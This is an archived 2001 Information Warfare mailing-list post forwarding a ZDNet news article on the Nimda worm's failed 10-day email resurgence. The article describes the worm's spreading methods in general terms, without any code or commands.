[iwar] [fc:Nimda.comeback.thwarted]

From: Fred Cohen (fc@all.net)
Date: 2001-10-02 05:48:56


Return-Path: <sentto-279987-2601-1002026952-fc=all.net@returns.onelist.com>
Delivered-To: fc@all.net
Received: from 204.181.12.215 by localhost with POP3 (fetchmail-5.1.0) for fc@localhost (single-drop); Tue, 02 Oct 2001 05:52:36 -0700 (PDT)
Received: (qmail 12525 invoked by uid 510); 2 Oct 2001 12:49:19 -0000
Received: from n6.groups.yahoo.com (216.115.96.56) by 204.181.12.215 with SMTP; 2 Oct 2001 12:49:19 -0000
X-eGroups-Return: sentto-279987-2601-1002026952-fc=all.net@returns.onelist.com
Received: from [10.1.4.53] by n6.groups.yahoo.com with NNFMP; 02 Oct 2001 12:49:12 -0000
X-Sender: fc@big.all.net
X-Apparently-To: iwar@onelist.com
Received: (EGP: mail-7_4_1); 2 Oct 2001 12:49:11 -0000
Received: (qmail 34259 invoked from network); 2 Oct 2001 12:49:11 -0000
Received: from unknown (10.1.10.27) by l7.egroups.com with QMQP; 2 Oct 2001 12:49:11 -0000
Received: from unknown (HELO big.all.net) (65.0.156.78) by mta2 with SMTP; 2 Oct 2001 12:49:06 -0000
Received: (from fc@localhost) by big.all.net (8.9.3/8.7.3) id FAA03088 for iwar@onelist.com; Tue, 2 Oct 2001 05:48:56 -0700
Message-Id: <200110021248.FAA03088@big.all.net>
To: iwar@onelist.com (Information Warfare Mailing List)
Organization: I'm not allowed to say
X-Mailer: don't even ask
X-Mailer: ELM [version 2.5 PL1]
From: Fred Cohen <fc@all.net>
Mailing-List: list iwar@yahoogroups.com; contact iwar-owner@yahoogroups.com
Delivered-To: mailing list iwar@yahoogroups.com
Precedence: bulk
List-Unsubscribe: <mailto:iwar-unsubscribe@yahoogroups.com>
Date: Tue, 2 Oct 2001 05:48:56 -0700 (PDT)
Reply-To: iwar@yahoogroups.com
Subject: [iwar] [fc:Nimda.comeback.thwarted]
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit

Nimda comeback thwarted

By Robert Lemos, ZDNet News, 10/1/2001
<a href="http://dailynews.yahoo.com/h/zd/20010930/tc/nimda_comeback_thwarted_1.html">http://dailynews.yahoo.com/h/zd/20010930/tc/nimda_comeback_thwarted_1.html>

Enough people patched their computers to head off more problems from the
Nimda worm, which was targeted to reactivate itself after 10 days. 

A resurgence of the Nimda worm failed to materialize Friday, leaving
unfulfilled warnings that several security companies made this week. 

The e-mail component of the worm, which sends infected messages to each
entry in an infected computer's Outlook address book, reactivates 10
days after the original infection.  That part of the program had
antivirus researchers and security experts worried that the Nimda worm
was again set to spread quickly. 

But Friday morning, 10 days after the first infections started to take
hold, few signs heralded a return of the worm. 

"We have been checking throughout the entire day, and we are not seeing
anything," said John Harrington, director of marketing for e-mail
filtering service MessageLabs.  "Our gut feeling is that it is not going
to happen."

According to MessageLabs' Web site, the company has detected fewer than
1,600 copies of the virus since the start of the epidemic 10 days ago. 

Nimda--which is "admin," the shortened form of "system administrator,"
spelled backward--started spreading Sept.  18 and quickly infected PCs
and servers around the world.  Also known as "readme.exe" and
"W32.Nimda," the worm is the first to use four different methods to
infect not only PCs running Windows 95, 98, Me and 2000, but also
servers running Windows 2000 (news - web sites). 

The worm spreads by e-mailing itself as an attachment, scanning for and
then infecting vulnerable Web servers running Microsoft's Internet
Information Server software, copying itself to shared disk drives on
networked PCs, and appending JavaScript code to Web pages that will
download the worm to surfers' PCs when they view the page. 

The e-mail component of the worm sends Nimda-infected messages every 10
days, counting from when the victim was originally infected.  Since the
virus is thought to have started Sept.  18 at 8:30 a.m.  PDT, the first
new e-mails should have started going out early Friday. 

Only a few infected computers may be left, however. 

Anti-virus software maker Trend Micro said that while some companies
reported infections Friday, the number is still low. 

"We've seen a few infections in organizations that haven't done a
complete cleaning, but it's limited," said company spokeswoman Susan
Orbuch. 

Furthermore, compromised servers and PCs without Outlook installed will
only have a limited number of e-mail addresses to which to send
messages.  The worm also scans the browser cache on computers for saved
Web pages that contain e-mail addresses and sends infected messages to
those addresses as well. 

Servers that aren't used to browse the Internet will not have such a
cache. 

------------------------ Yahoo! Groups Sponsor ---------------------~-->
Get your FREE VeriSign guide to security solutions for your web site: encrypting transactions, securing intranets, and more!
http://us.click.yahoo.com/UnN2wB/m5_CAA/yigFAA/kgFolB/TM
---------------------------------------------------------------------~->

------------------
http://all.net/ 

Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 



This archive was generated by hypermail 2.1.2 : 2001-12-31 20:59:53 PST